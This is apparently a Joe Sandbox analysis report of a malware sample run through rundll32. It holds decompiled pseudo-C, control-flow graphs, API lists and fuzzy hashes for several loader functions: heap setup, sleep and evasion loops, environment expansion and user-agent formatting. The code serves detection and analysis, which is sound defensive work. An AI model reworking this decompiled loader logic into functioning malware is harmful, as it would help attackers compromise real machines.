                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 6eb37d6c2ad040b998496e14647af4a415317ff3b5f4f9dd310f79f9ea3def22
                                          • Instruction ID: a91c8fc1a649fad47d84467317a271baf4072c31f8eb5546982cfcef94250fab
                                          • Opcode Fuzzy Hash: 6eb37d6c2ad040b998496e14647af4a415317ff3b5f4f9dd310f79f9ea3def22
                                          • Instruction Fuzzy Hash: DA01B572A05325AFD321AF659C48E3BBEDDEB85A50F150519F841DB240EB61E80396F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD4908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 4fd4908-4fd4922 call 4fd11af 238 4fd4938-4fd4946 235->238 239 4fd4924-4fd4932 235->239 241 4fd4958-4fd4973 call 4fd1111 238->241 242 4fd4948-4fd494b 238->242 239->238 248 4fd497d 241->248 249 4fd4975-4fd497b 241->249 242->241 243 4fd494d-4fd4952 242->243 243->241 245 4fd4adb 243->245 247 4fd4add-4fd4ae2 245->247 250 4fd4983-4fd4998 call 4fd1ec4 call 4fd1a4e 248->250 249->250 255 4fd499a-4fd499d CloseHandle 250->255 256 4fd49a3-4fd49a9 250->256 255->256 257 4fd49cf-4fd49e7 call 4fd58be 256->257 258 4fd49ab-4fd49b0 256->258 267 4fd49e9-4fd4a11 memset RtlInitializeCriticalSection 257->267 268 4fd4a13-4fd4a15 257->268 259 4fd4ac6-4fd4acb 258->259 260 4fd49b6 258->260 262 4fd4acd-4fd4ad1 259->262 263 4fd4ad3-4fd4ad9 259->263 264 4fd49b9-4fd49c8 call 4fd7827 260->264 262->247 262->263 263->247 272 4fd49ca 264->272 271 4fd4a16-4fd4a1a 267->271 268->271 271->259 273 4fd4a20-4fd4a36 RtlAllocateHeap 271->273 272->259 274 4fd4a38-4fd4a64 wsprintfA 273->274 275 4fd4a66-4fd4a68 273->275 276 4fd4a69-4fd4a6d 274->276 275->276 276->259 277 4fd4a6f-4fd4a8f call 4fd93d5 call 4fd98f7 276->277 277->259 282 4fd4a91-4fd4a98 call 4fd205b 277->282 285 4fd4a9f-4fd4aa6 282->285 286 4fd4a9a-4fd4a9d 282->286 287 4fd4aa8-4fd4aaa 285->287 288 4fd4abb-4fd4abf call 4fd9b6f 285->288 286->259 287->259 290 4fd4aac-4fd4ab0 call 4fd6cd3 287->290 291 4fd4ac4 288->291 293 4fd4ab5-4fd4ab9 290->293 291->259 293->259 293->288
                                          C-Code - Quality: 57%
                                          			E04FD4908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04FD11AF();
				if(_t21 != 0) {
					_t59 =  *0x4fdd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4fdd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4fdd164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04FD1111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4fdd2a4; // 0x254a5a8
					if( *0x4fdd25c > 5) {
						_t8 = _t26 + 0x4fde5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4fdea05; // 0x44283a44
						_t27 = _t7;
					}
					E04FD1EC4(_t27, _t27);
					_t31 = E04FD1A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x4fdd270 =  *0x4fdd270 ^ 0x81bbe65d;
						_t32 = E04FD58BE(0x60);
						 *0x4fdd324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4fdd324; // 0x75295b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4fdd324; // 0x75295b0
							 *_t51 = 0x4fde845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4fdd238, 0, 0x43);
							 *0x4fdd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4fdd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4fdd2a4; // 0x254a5a8
								_t13 = _t58 + 0x4fde55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4fdc28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04FD93D5( ~_v8 &  *0x4fdd270, 0x4fdd00c); // executed
								_t42 = E04FD98F7(0, _t55, _t63, 0x4fdd00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04FD205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04FD9B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04FD6CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4fdd160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04FD7827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x04fd4908
                                          0x04fd4912
                                          0x04fd4915
                                          0x04fd4918
                                          0x04fd491b
                                          0x04fd4922
                                          0x04fd4924
                                          0x04fd4930
                                          0x04fd4932
                                          0x04fd4932
                                          0x04fd493b
                                          0x04fd4941
                                          0x04fd4946
                                          0x04fd4960
                                          0x04fd496c
                                          0x04fd496e
                                          0x04fd4973
                                          0x04fd497d
                                          0x04fd497d
                                          0x04fd4975
                                          0x04fd4975
                                          0x04fd4975
                                          0x04fd4975
                                          0x04fd4984
                                          0x04fd4991
                                          0x04fd4998
                                          0x04fd499d
                                          0x04fd499d
                                          0x04fd49a6
                                          0x04fd49a9
                                          0x04fd49cf
                                          0x04fd49db
                                          0x04fd49e0
                                          0x04fd49e5
                                          0x04fd49e7
                                          0x04fd4a13
                                          0x04fd4a15
                                          0x04fd49e9
                                          0x04fd49ed
                                          0x04fd49f2
                                          0x04fd49f7
                                          0x04fd49fe
                                          0x04fd4a04
                                          0x04fd4a09
                                          0x04fd4a0f
                                          0x04fd4a16
                                          0x04fd4a18
                                          0x04fd4a1a
                                          0x04fd4a29
                                          0x04fd4a2f
                                          0x04fd4a34
                                          0x04fd4a36
                                          0x04fd4a66
                                          0x04fd4a68
                                          0x04fd4a38
                                          0x04fd4a38
                                          0x04fd4a3e
                                          0x04fd4a4b
                                          0x04fd4a51
                                          0x04fd4a51
                                          0x04fd4a59
                                          0x04fd4a62
                                          0x04fd4a69
                                          0x04fd4a6b
                                          0x04fd4a6d
                                          0x04fd4a74
                                          0x04fd4a81
                                          0x04fd4a86
                                          0x04fd4a8b
                                          0x04fd4a8d
                                          0x04fd4a8f
                                          0x00000000
                                          0x00000000
                                          0x04fd4a91
                                          0x04fd4a96
                                          0x04fd4a98
                                          0x04fd4a9f
                                          0x04fd4aa3
                                          0x04fd4aa6
                                          0x04fd4abb
                                          0x04fd4abf
                                          0x04fd4ac4
                                          0x00000000
                                          0x04fd4ac4
                                          0x04fd4aa8
                                          0x04fd4aaa
                                          0x00000000
                                          0x00000000
                                          0x04fd4ab0
                                          0x04fd4ab5
                                          0x04fd4ab7
                                          0x04fd4ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd4ab9
                                          0x04fd4a9c
                                          0x04fd4a9c
                                          0x04fd4a6d
                                          0x04fd49ab
                                          0x04fd49ab
                                          0x04fd49b0
                                          0x04fd4ac6
                                          0x04fd4acb
                                          0x04fd4ad3
                                          0x04fd4ad3
                                          0x00000000
                                          0x04fd4acb
                                          0x04fd49b6
                                          0x04fd49b9
                                          0x04fd49c3
                                          0x04fd49ca
                                          0x00000000
                                          0x04fd4adb
                                          0x04fd4adb
                                          0x04fd4ade
                                          0x04fd4ae2
                                          0x04fd4ae2

                                          APIs
                                            • Part of subcall function 04FD11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04FD4920,00000001), ref: 04FD11BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04FD499D
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • memset.NTDLL ref: 04FD49ED
                                          • RtlInitializeCriticalSection.NTDLL(07529570), ref: 04FD49FE
                                            • Part of subcall function 04FD6CD3: memset.NTDLL ref: 04FD6CED
                                            • Part of subcall function 04FD6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04FD6D24
                                            • Part of subcall function 04FD6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04FD4AB5), ref: 04FD6D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04FD4A29
                                          • wsprintfA.USER32 ref: 04FD4A59
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: da0c715f487399f0c2a46f67114c78dad31b1553b73d18d89126493b7ebb6152
                                          • Instruction ID: e5729b9196ac8866deed0a672e3d90836e415a643dd81adadc9479569b28c820
                                          • Opcode Fuzzy Hash: da0c715f487399f0c2a46f67114c78dad31b1553b73d18d89126493b7ebb6152
                                          • Instruction Fuzzy Hash: 4F51D571E41219AFEB21EFB4EC88B6E77ABEB08704F0C0525E101D7184E778F9028B56
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD6CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04FD6CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x4fdd2a4; // 0x254a5a8
				_t5 = _t40 + 0x4fdee24; // 0x410025
				_t90 = E04FD4814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E04FD147E(_v88);
					goto L24;
				}
				if(E04FD9138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E04FDA5E9(0,  *0x4fdd33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x4fdd2a4; // 0x254a5a8
					_t11 = _t52 + 0x4fde81a; // 0x65696c43
					_t55 = E04FDA5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E04FD74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E04FD147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E04FD147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E04FD568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x4fdd260 & 0x00000001) == 0) {
							L14:
							E04FD6E92(_t81, _v60, _v56,  *0x4fdd270, 0);
							_t81 = E04FD6737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E04FD72F2( &_v84, 0);
							}
							E04FD147E(_v60);
							goto L17;
						}
						_t67 =  *0x4fdd2a4; // 0x254a5a8
						_t18 = _t67 + 0x4fde823; // 0x65696c43
						_t70 = E04FDA5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E04FD74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E04FD147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x04fd6ce9
                                          0x04fd6ced
                                          0x04fd6cf4
                                          0x04fd6cfc
                                          0x04fd6cfd
                                          0x04fd6cfe
                                          0x04fd6cff
                                          0x04fd6d00
                                          0x04fd6d01
                                          0x04fd6d09
                                          0x04fd6d15
                                          0x04fd6d17
                                          0x04fd6d1d
                                          0x04fd6e86
                                          0x04fd6e87
                                          0x04fd6e8f
                                          0x04fd6e8f
                                          0x04fd6d2f
                                          0x04fd6d37
                                          0x04fd6e78
                                          0x04fd6e79
                                          0x04fd6e7d
                                          0x00000000
                                          0x04fd6e7d
                                          0x04fd6d4a
                                          0x04fd6d4c
                                          0x04fd6d4c
                                          0x04fd6d58
                                          0x04fd6d5d
                                          0x04fd6d63
                                          0x04fd6e66
                                          0x00000000
                                          0x04fd6d69
                                          0x04fd6d69
                                          0x04fd6d6e
                                          0x04fd6d77
                                          0x04fd6d7c
                                          0x04fd6d85
                                          0x04fd6dac
                                          0x04fd6d87
                                          0x04fd6da1
                                          0x04fd6da3
                                          0x04fd6da3
                                          0x04fd6daf
                                          0x04fd6e59
                                          0x04fd6e5d
                                          0x04fd6e67
                                          0x04fd6e67
                                          0x04fd6e6d
                                          0x04fd6e6f
                                          0x04fd6e6f
                                          0x00000000
                                          0x04fd6db5
                                          0x04fd6dbc
                                          0x04fd6e01
                                          0x04fd6e14
                                          0x04fd6e2d
                                          0x04fd6e31
                                          0x04fd6e37
                                          0x04fd6e3f
                                          0x04fd6e4e
                                          0x04fd6e4e
                                          0x04fd6e54
                                          0x00000000
                                          0x04fd6e54
                                          0x04fd6dbe
                                          0x04fd6dc3
                                          0x04fd6dcc
                                          0x04fd6dd1
                                          0x04fd6dd5
                                          0x04fd6dfc
                                          0x04fd6dd7
                                          0x04fd6de7
                                          0x04fd6df1
                                          0x04fd6df3
                                          0x04fd6df3
                                          0x04fd6dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd6dff
                                          0x04fd6daf

                                          APIs
                                          • memset.NTDLL ref: 04FD6CED
                                            • Part of subcall function 04FD4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04FD6D15,00410025,00000005,?,00000000), ref: 04FD4825
                                            • Part of subcall function 04FD4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04FD4842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04FD6D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04FD4AB5), ref: 04FD6D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 57396b7812fcf4027021245a6ce82c036f56d268b06864de1f99670c4114d5fd
                                          • Instruction ID: ff0fac9838be7ec164b6709d4117e9dedc7358348860756e29033b3f8e8431b5
                                          • Opcode Fuzzy Hash: 57396b7812fcf4027021245a6ce82c036f56d268b06864de1f99670c4114d5fd
                                          • Instruction Fuzzy Hash: 6F41C072604345AFE711AFA0DC84D6FB7EEEF49208F084A2AF984D7110D671ED06CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD4FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 4fd4ffa-4fd503c 352 4fd50c3-4fd50c9 350->352 353 4fd5042-4fd504b 350->353 354 4fd504d-4fd505e SysAllocString 353->354 355 4fd508c-4fd508f 353->355 356 4fd5069-4fd5081 354->356 357 4fd5060-4fd5067 354->357 358 4fd50ed 355->358 359 4fd5091-4fd50a1 SysAllocString 355->359 367 4fd5085-4fd508a 356->367 363 4fd50b5-4fd50b8 357->363 362 4fd50ef-4fd50f2 358->362 360 4fd50cc-4fd50eb 359->360 361 4fd50a3 359->361 360->362 364 4fd50aa-4fd50ac 361->364 362->364 366 4fd50f4-4fd5101 362->366 363->352 365 4fd50ba-4fd50bd SysFreeString 363->365 364->363 368 4fd50ae-4fd50af SysFreeString 364->368 365->352 366->352 367->355 367->363 368->363
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04FD5057
                                          • SysAllocString.OLEAUT32(04FDA6F4), ref: 04FD509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD50AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD50BD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 43a0572c2aa5bdd4179d43c97882b6a60abfc76e3dfe2c811e139f11570b1468
                                          • Instruction ID: 2de03a5231a77d2afeb81585b4963816f2e8455f2547d0006f90df47578ea6ec
                                          • Opcode Fuzzy Hash: 43a0572c2aa5bdd4179d43c97882b6a60abfc76e3dfe2c811e139f11570b1468
                                          • Instruction Fuzzy Hash: 6A31FF7290024AFFCB05DF98D8848AE7BBAFF48340B14951EF5069B250E775A942CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD1295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 370 4fd1295-4fd12a9 371 4fd12ae-4fd12b3 370->371 372 4fd12b9-4fd12bc 371->372 373 4fd134a-4fd1351 371->373 374 4fd12be-4fd12d3 Sleep 372->374 375 4fd12d6-4fd12d9 372->375 374->375 375->373 376 4fd12db-4fd12e0 375->376 378 4fd133d-4fd1348 376->378 379 4fd12e2-4fd12f4 376->379 378->373 381 4fd1334-4fd1339 379->381 382 4fd12f6-4fd1303 lstrlenW 379->382 381->378 382->381 383 4fd1305-4fd1313 call 4fd58be 382->383 386 4fd1315-4fd1322 memcpy 383->386 387 4fd1324 383->387 388 4fd132b-4fd132e SysFreeString 386->388 387->388 388->381
                                          C-Code - Quality: 78%
                                          			E04FD1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04FD58BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x04fd12a1
                                          0x04fd12a5
                                          0x04fd12a6
                                          0x04fd12a7
                                          0x04fd12a9
                                          0x04fd12ab
                                          0x04fd12ae
                                          0x04fd12b3
                                          0x04fd134a
                                          0x04fd1351
                                          0x04fd1351
                                          0x04fd12bc
                                          0x04fd12c3
                                          0x04fd12d3
                                          0x04fd12d3
                                          0x04fd12d9
                                          0x04fd12db
                                          0x04fd12e0
                                          0x04fd12e9
                                          0x04fd12ef
                                          0x04fd12f4
                                          0x04fd12ff
                                          0x04fd1303
                                          0x04fd1305
                                          0x04fd1306
                                          0x04fd130f
                                          0x04fd1313
                                          0x04fd1324
                                          0x04fd1315
                                          0x04fd131a
                                          0x04fd131f
                                          0x04fd132e
                                          0x04fd132e
                                          0x04fd1303
                                          0x04fd1334
                                          0x04fd133a
                                          0x04fd133a
                                          0x04fd1343
                                          0x04fd1348
                                          0x04fd1348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 1b35120a9a335f225da665103215bffe2f0d81a6ddada14379f76225a402d8b2
                                          • Instruction ID: d2d68f9a072fe8d0fd1df6ca220225db9f7f329a28310c39c7392f001774ab17
                                          • Opcode Fuzzy Hash: 1b35120a9a335f225da665103215bffe2f0d81a6ddada14379f76225a402d8b2
                                          • Instruction Fuzzy Hash: 6C214F7590120AEFDB11EFA4D9889DEBBBAFF49305B144169E945E7200EB30EA42CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD90A1, Relevance: 6.0, APIs: 4, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 389 4fd90a1-4fd90b7 HeapCreate 390 4fd90be-4fd90d4 GetTickCount call 4fd6a7f 389->390 391 4fd90b9-4fd90bc 389->391 392 4fd911c 390->392 395 4fd90d6-4fd90d7 390->395 391->392 396 4fd90d8-4fd9100 SwitchToThread call 4fd1c04 Sleep 395->396 399 4fd9102-4fd910b call 4fd9511 396->399 402 4fd910d 399->402 403 4fd9117 call 4fd4908 399->403 402->403 403->392
                                          C-Code - Quality: 100%
                                          			E04FD90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4fdd238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x4fdd1a8 = GetTickCount();
				_t7 = E04FD6A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E04FD1C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E04FD9511(_t15) != 0) {
						 *0x4fdd260 = 1; // executed
					}
					_t13 = E04FD4908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x04fd90a1
                                          0x04fd90aa
                                          0x04fd90b0
                                          0x04fd90b7
                                          0x04fd90bb
                                          0x00000000
                                          0x04fd90bb
                                          0x04fd90c8
                                          0x04fd90cd
                                          0x04fd90d4
                                          0x04fd90d8
                                          0x04fd90e4
                                          0x04fd90e8
                                          0x04fd90f7
                                          0x04fd90fd
                                          0x04fd910b
                                          0x04fd910d
                                          0x04fd910d
                                          0x04fd9117
                                          0x00000000
                                          0x04fd9117
                                          0x04fd911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04FD6F11,?), ref: 04FD90AA
                                          • GetTickCount.KERNEL32 ref: 04FD90BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 04FD90D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 04FD90F7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 5b42eb50fb873d95700fa039818c6385378ab352558fea93a834bcff7d2e6e93
                                          • Instruction ID: c9d72ea0e34aa806ae176fac01b7ce5798c4c5e7ea7bed3476fe5760516c306e
                                          • Opcode Fuzzy Hash: 5b42eb50fb873d95700fa039818c6385378ab352558fea93a834bcff7d2e6e93
                                          • Instruction Fuzzy Hash: F0F09C72A413086BF7107FB4BC4CF5A7BA7EF49759F084025E905D7140E778E802C661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD68CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
